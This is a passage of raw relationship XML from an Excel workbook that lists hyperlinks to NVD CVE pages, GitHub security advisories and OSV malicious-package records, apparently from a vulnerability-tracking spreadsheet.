Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81330" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82392" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83961" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84989" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85089" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86204" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86757" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86758" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86759" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86765" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86766" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87072" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87821" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87998" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87999" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54467" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56711" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63387" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79636" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87088" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87825" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87877" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59158" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59160" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59172" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59176" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59177" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59179" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59185" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-hxjg-93wc-h8p8" TargetMode="External" Id="rId641" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54745" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65956" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77776" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85391" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87911" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19633" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55509" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79756" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50553" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55848" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77775" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55581" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55582" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86242" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52831" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79755" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15140" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54245" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63404" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79754" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53583" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19634" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83534" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32637" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69129" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85788" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86222" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84371" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77310" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84967" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19729" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53487" TargetMode="External" Id="rId39" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63310" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-rg7q-4223-phjw" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85730" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55864" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53495" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88000" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88002" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88001" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56317" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-xppm-jmw6-fhmf" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-24890" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-24978" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-24979" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-58363" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30922" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42027" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42151" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44282" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45674" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47691" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50024" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54529" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55073" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56341" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59157" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59158" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59160" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59172" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59176" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59177" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59179" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59185" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16109" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16090" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16083" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16084" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16108" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16088" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16110" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16087" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16089" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16068" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16067" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-hxjg-93wc-h8p8" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GO-2026-6302" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16092" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16066" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16107" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16085" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16093" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16106" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16086" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16091" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16053" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16054" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16055" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16059" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16060" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16061" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16062" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16063" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16064" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16065" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16069" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16070" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16071" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16072" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16073" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16074" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16075" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16076" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16077" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16078" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16079" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16080" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16081" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16082" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16094" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16095" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16096" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16097" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16098" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16099" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16100" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16101" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16102" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 